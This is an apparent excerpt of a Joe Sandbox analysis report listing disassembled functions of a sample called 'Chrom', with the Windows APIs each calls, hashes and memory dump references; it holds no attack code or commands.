                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileNameOpenwcscpy
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 3246554996-3081909835
                                                                                                                                                        • Opcode ID: 2a67dbd5aac994321e133afa0018ae29574dd41fddbd4530bc2321b891ce1e3f
                                                                                                                                                        • Instruction ID: 539f78c5397e7073aed27145bddffd849fb5fc534cbcdb44ae1ffce86d8eed53
                                                                                                                                                        • Opcode Fuzzy Hash: 2a67dbd5aac994321e133afa0018ae29574dd41fddbd4530bc2321b891ce1e3f
                                                                                                                                                        • Instruction Fuzzy Hash: 6C0162B1D0124C9FDB51DFE9D8856CEBBF4BF09318F10802AE819F6240EB7495458F55
                                                                                                                                                        Function 0040DF2E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DF52
                                                                                                                                                        • LoadStringW.USER32(hE,00000000,?,00001000), ref: 0040DF6A
                                                                                                                                                          • Part of subcall function 0040DC1C: memset.MSVCRT ref: 0040DC2F
                                                                                                                                                          • Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$LoadString_itow
                                                                                                                                                        • String ID: hE
                                                                                                                                                        • API String ID: 2363904170-2023966264
                                                                                                                                                        • Opcode ID: a9946285b92afe35a5342dbba43cd3e7e620973a75260ca37de27efc1ebb9654
                                                                                                                                                        • Instruction ID: 9b56b68215c9794ac37e938ab49c8f41abb91b806af26c10162807848ed08486
                                                                                                                                                        • Opcode Fuzzy Hash: a9946285b92afe35a5342dbba43cd3e7e620973a75260ca37de27efc1ebb9654
                                                                                                                                                        • Instruction Fuzzy Hash: D8F08272D0022969F720A7459D4ABDFB79C9F05744F000076BB0CE1192D6649A44C7AE
                                                                                                                                                        Function 0040DC1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DC2F
                                                                                                                                                        • _itow.MSVCRT ref: 0040DC3D
                                                                                                                                                          • Part of subcall function 0040DBA3: memset.MSVCRT ref: 0040DBC8
                                                                                                                                                          • Part of subcall function 0040DBA3: GetPrivateProfileStringW.KERNEL32(0045E668,?,0044F4CC,?,00001000,0045E458), ref: 0040DBF0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$PrivateProfileString_itow
                                                                                                                                                        • String ID: hE
                                                                                                                                                        • API String ID: 1482724422-2023966264
                                                                                                                                                        • Opcode ID: 9d91d721a2435454d66ee30fea597a374f678bd0bf4a4b4aeba8e389cc8d88fc
                                                                                                                                                        • Instruction ID: 5887821bd48b257a389a8619214a73bf64326750db89a50052b3e3f26cdab3d4
                                                                                                                                                        • Opcode Fuzzy Hash: 9d91d721a2435454d66ee30fea597a374f678bd0bf4a4b4aeba8e389cc8d88fc
                                                                                                                                                        • Instruction Fuzzy Hash: 82E0BFB194030CF6EF10BBD1CC46F9D77BC6B05758F110425BA04A51C1E7B4A6598756
                                                                                                                                                        Function 00416D79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00416D91
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00406A8C,00000000), ref: 00416DA9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: shlwapi.dll
                                                                                                                                                        • API String ID: 3150196962-3792422438
                                                                                                                                                        • Opcode ID: 0ba260915fc044c9060a9267e76b53ad6964ed23a45c776f21564570e230f864
                                                                                                                                                        • Instruction ID: 8953b9299a98f99d53b06e6692452402a631d67aef832c0f4ad793a499166b8b
                                                                                                                                                        • Opcode Fuzzy Hash: 0ba260915fc044c9060a9267e76b53ad6964ed23a45c776f21564570e230f864
                                                                                                                                                        • Instruction Fuzzy Hash: 77D01235205620AFD6516B26EC05AAF2AA5EFC2353B064035FC44D2251DB288C4A8669
                                                                                                                                                        Function 004173D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(0045EB90,00000000,00000001), ref: 004173DE
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(0045EAE8), ref: 004173F8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompareCriticalDeleteExchangeInterlockedSection
                                                                                                                                                        • String ID: E
                                                                                                                                                        • API String ID: 1152216905-2089609516
                                                                                                                                                        • Opcode ID: 41052287ff6157aca7ae807cc5e0ab8c053c410c9bf42ce8b0cf4aaaa29973d0
                                                                                                                                                        • Instruction ID: a08b94eee07b275f18df31a14d48185bcbd6fbf62116246691b6506a81ff28e0
                                                                                                                                                        • Opcode Fuzzy Hash: 41052287ff6157aca7ae807cc5e0ab8c053c410c9bf42ce8b0cf4aaaa29973d0
                                                                                                                                                        • Instruction Fuzzy Hash: 6DE0C23580123043DF249B355D08BC63764A701307F000433FF08E1593D3589DC8465E
                                                                                                                                                        Function 0040A394 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0045EC58,00000104,?,0041545E,?,?,00000000,00000208,?), ref: 0040A3AA
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040A3BA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DirectoryWindowswcscpy
                                                                                                                                                        • String ID: XE
                                                                                                                                                        • API String ID: 3999232144-3649240766
                                                                                                                                                        • Opcode ID: ee863e4ac16fe2bc2a50466a47192c7d1d348325111a7f9272ab4bdfadf89a60
                                                                                                                                                        • Instruction ID: 4a4bab80cec1fde47f2faee4497fd5c8b1cbd1d111bef82ff05efc413ebbe1fc
                                                                                                                                                        • Opcode Fuzzy Hash: ee863e4ac16fe2bc2a50466a47192c7d1d348325111a7f9272ab4bdfadf89a60
                                                                                                                                                        • Instruction Fuzzy Hash: EED0A732819350EFF309AB16FD4688637A4EB05331F10407BF801521A1E7B49E84C68E
                                                                                                                                                        Function 0040E18E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
                                                                                                                                                        • wcsrchr.MSVCRT ref: 0040E197
                                                                                                                                                        • wcscat.MSVCRT ref: 0040E1AD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                        • String ID: _lng.ini
                                                                                                                                                        • API String ID: 383090722-1948609170
                                                                                                                                                        • Opcode ID: fc401660792f3259079d155ab2926aa0832a50f509c5fa83b23360e965731080
                                                                                                                                                        • Instruction ID: 8b583429bb2f73c15531c1fc6ec83a8602d0f7af3b9842199d22d9f13e476b24
                                                                                                                                                        • Opcode Fuzzy Hash: fc401660792f3259079d155ab2926aa0832a50f509c5fa83b23360e965731080
                                                                                                                                                        • Instruction Fuzzy Hash: DBC0127668261020F12633226D03BAA02484F03709F25003BFC012E1C2ABAC56A240AF
                                                                                                                                                        Function 00416AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00416B0A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                        • API String ID: 2773794195-880857682
                                                                                                                                                        • Opcode ID: c1b45a8134029c03373e9e62df4e01b2212aa259df3a417208d0da953679c99d
                                                                                                                                                        • Instruction ID: 99dbe11720a893006f653479ba407f655e67b82aae680071a902f62ebf455638
                                                                                                                                                        • Opcode Fuzzy Hash: c1b45a8134029c03373e9e62df4e01b2212aa259df3a417208d0da953679c99d
                                                                                                                                                        • Instruction Fuzzy Hash: 6BD0C7B1548311A9E7045B72BC097113654A711307F144077B800D2997EB78D9459F1D
                                                                                                                                                        Function 0042D909 Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042D9AB
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042D9E4
                                                                                                                                                        • memset.MSVCRT ref: 0042D9FA
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042DA33
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 438689982-0
                                                                                                                                                        • Opcode ID: 8146a5a9f1215ff6fa9f3d5588c159669d09d75e34f759fa96b1d6c6d51f12fb
                                                                                                                                                        • Instruction ID: 22161e07a8dd0176d215964da5b89ff37004ec298054f59c146abe01b4a1168d
                                                                                                                                                        • Opcode Fuzzy Hash: 8146a5a9f1215ff6fa9f3d5588c159669d09d75e34f759fa96b1d6c6d51f12fb
                                                                                                                                                        • Instruction Fuzzy Hash: 635182B5E00219EFDF14EF55DC42AAEBBB5FF04340F55806AF904AA241E7389E50CB99
                                                                                                                                                        Function 0040E35C Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A6FB: memset.MSVCRT ref: 0040A709
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E389
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E3B0
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E3D1
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E3F2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@$memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1860491036-0
                                                                                                                                                        • Opcode ID: eb350b77a03d3952c19d09036869a2b52fa89c555923169d256a5bb9e8a87cdf
                                                                                                                                                        • Instruction ID: a8f70b2b8f0220c2fb0a7082b37bd867e83ef99612ffde3d47a64c7db78a1032
                                                                                                                                                        • Opcode Fuzzy Hash: eb350b77a03d3952c19d09036869a2b52fa89c555923169d256a5bb9e8a87cdf
                                                                                                                                                        • Instruction Fuzzy Hash: F521E6B0A117008FD7619F2B8444A15FFE8FF90310B2689AFD559CB2B2D3B8C450CB25
                                                                                                                                                        Function 0040AEF6 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
                                                                                                                                                          • Part of subcall function 00409FB3: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                          • Part of subcall function 00409FB3: free.MSVCRT ref: 00409FF0
                                                                                                                                                        • free.MSVCRT ref: 0040AF2E
                                                                                                                                                        • free.MSVCRT ref: 0040AF51
                                                                                                                                                        • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 726966127-0
                                                                                                                                                        • Opcode ID: 331cd75d25474b200007b092dd27d2fe5eea30cc0ecd3ad211855935377a92b8
                                                                                                                                                        • Instruction ID: 62c255610b828a0a43b98215f9d769f251a011d3a86863779d24e99e918d36f1
                                                                                                                                                        • Opcode Fuzzy Hash: 331cd75d25474b200007b092dd27d2fe5eea30cc0ecd3ad211855935377a92b8
                                                                                                                                                        • Instruction Fuzzy Hash: C0218EB1100705EFD720EF18C88189AB3F4EF453247108A2EF9669B2D1C735F919CB55
                                                                                                                                                        Function 00404447 Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcmp.MSVCRT(?,0045B238,00000010,00000000,00404FFF,?,00404592,00404FFF,?,00404FFF,00409A5B,00000000), ref: 0040445E
                                                                                                                                                          • Part of subcall function 004043D9: memcmp.MSVCRT(00404FFF,0040447D,00000004,000000FF), ref: 004043F7
                                                                                                                                                          • Part of subcall function 004043D9: memcpy.MSVCRT(00000367,00405019,48891048,?), ref: 00404426
                                                                                                                                                          • Part of subcall function 004043D9: memcpy.MSVCRT(-00000269,0040501E,00000060,00000367,00405019,48891048,?), ref: 0040443B
                                                                                                                                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00404FFF,?,00404592,00404FFF,?,00404FFF,00409A5B,00000000), ref: 00404496
                                                                                                                                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00404FFF,?,00404592,00404FFF,?,00404FFF,00409A5B,00000000), ref: 004044C7
                                                                                                                                                        • memcpy.MSVCRT(0000023E,00404FFF,?), ref: 004044E4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcmp$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 231171946-0
                                                                                                                                                        • Opcode ID: 02b7e515e6cb7942f6ab12f07e0d827038bf1469a5ded1db4bdf5d811a63220b
                                                                                                                                                        • Instruction ID: 50c4ff2e8450c3fce798df969388a048485be3917a12ccca82d2995326f9277d
                                                                                                                                                        • Opcode Fuzzy Hash: 02b7e515e6cb7942f6ab12f07e0d827038bf1469a5ded1db4bdf5d811a63220b
                                                                                                                                                        • Instruction Fuzzy Hash: 2B11A5F16003146AFB2026129C06F9A3758EB91758F10843FFF44641C2FABEA950566E
                                                                                                                                                        Function 0040B6F7 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.MSVCRT ref: 0040B6FE
                                                                                                                                                        • free.MSVCRT ref: 0040B721
                                                                                                                                                          • Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
                                                                                                                                                          • Part of subcall function 00409FB3: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                          • Part of subcall function 00409FB3: free.MSVCRT ref: 00409FF0
                                                                                                                                                        • free.MSVCRT ref: 0040B752
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00406D5E,?), ref: 0040B77F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3669619086-0
                                                                                                                                                        • Opcode ID: 97e23aac66076e39f365f82e397f054d7c8dc4d8bc002d43dba8b43fe139d604
                                                                                                                                                        • Instruction ID: a2faa610dd64c27b0c2ef2c48459d55f7a4c7651722976a7707f5b611db7f3cc
                                                                                                                                                        • Opcode Fuzzy Hash: 97e23aac66076e39f365f82e397f054d7c8dc4d8bc002d43dba8b43fe139d604
                                                                                                                                                        • Instruction Fuzzy Hash: C6115A716043059FD730AB18EC8192637A6EB8733AB24813BF9049B3A3C735D8148BDD
                                                                                                                                                        Function 0041933B Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0041A0CF,000000FF,00000000,00000000,00419CBA,?,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000), ref: 00419356
                                                                                                                                                        • malloc.MSVCRT ref: 0041935E
